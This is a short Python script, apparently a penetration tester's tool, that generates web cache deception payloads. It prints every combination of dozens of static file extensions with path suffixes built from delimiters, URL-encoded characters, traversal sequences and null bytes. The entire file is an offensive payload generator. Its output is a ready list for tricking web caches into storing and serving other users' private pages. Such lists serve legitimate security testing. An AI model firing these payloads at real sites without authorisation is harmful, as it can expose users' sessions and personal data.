# quick lil script to generate a bunch of cache deception payloads for many file extensions and encodings, delimeters, null bytes etc.
# just add an extension or 
extensions = ['class', 'css', 'exe', 'jar', 'js', 'jpg', 'jpeg', 'gif', 'ico', 'iso', 'png', 'bmp', 'pict', 'csv', 'doc', 'docx', 'xls', 'xlsx', 'ps', 'pdf', 'pls', 'ppt', 'pptx', 'tif', 'tiff', 'ttf', 'otf', 'webp', 'woff', 'woff2', 'svg', 'svgz', 'eot', 'eps', 'ejs', 'swf', 'torrent', 'midi', 'mid', 'rar', 'pict', 'tar', 'mp4', 'zst']

files = [
        "/.js",                        
		"/nonexistent.js",             
		"/../nonexistent.js",          
		r"/%2e%2e/nonexistent.js",      
		"%0Anonexistent.js",           
		"%00nonexistent.js",           
		"%3Bnonexistent.js",           
		"%23nonexistent.js",           
		"%3Fname = valnonexistent.js", 
		"%26name=valnonexistent.js", 
		".js",
		r'!nonexistent.js',
		r'/..%2fnonexistent.js',
		r'#nonexistent.js',
		r'$nonexistent.js',
		r'%nonexistent.js',
		r'&nonexistent.js',
		r"'nonexistent.js",
		r'(nonexistent.js',
		r')nonexistent.js',
		r'*nonexistent.js',
		r'+nonexistent.js',
		r',nonexistent.js',
		r'-nonexistent.js',
		r'.nonexistent.js',
		r'/nonexistent.js',
		r':nonexistent.js',
		r';nonexistent.js',
		r'<nonexistent.js',
		r'=nonexistent.js',
		r'>nonexistent.js',
		r'?nonexistent.js',
		r'@nonexistent.js',
		r'[nonexistent.js',
		r'\\nonexistent.js',
		r']nonexistent.js',
		r'^nonexistent.js',
		r'_nonexistent.js',
		r'`nonexistent.js',
		r'{nonexistent.js',
		r'|nonexistent.js',
		r'}nonexistent.js',
		r'~nonexistent.js',
		r'%21nonexistent.js',
		r'%22nonexistent.js',
		r'%24nonexistent.js',
		r'%25nonexistent.js',
		r'%26nonexistent.js',
		r'%27nonexistent.js',
		r'%28nonexistent.js',
		r'%29nonexistent.js',
		r'%2Anonexistent.js',
		r'%2Bnonexistent.js',
		r'%2Cnonexistent.js',
		r'%2Dnonexistent.js',
		r'%2Enonexistent.js',
		r'%2Fnonexistent.js',
		r'%3Anonexistent.js',
		r'%3Cnonexistent.js',
		r'%3Dnonexistent.js',
		r'%3Enonexistent.js',
		r'%3Fnonexistent.js',
		r'%40nonexistent.js',
		r'%5Bnonexistent.js',
		r'%5Cnonexistent.js',
		r'%5Dnonexistent.js',
		r'%5Enonexistent.js',
		r'%5Fnonexistent.js',
		r'%60nonexistent.js',
		r'%7Bnonexistent.js',
		r'%7Cnonexistent.js',
		r'%7Dnonexistent.js',
		r'%7Enonexistent.js',
    ]

for ext in extensions: 
    for file in files:
        print(r'"' + file.replace('js', ext) + r'",')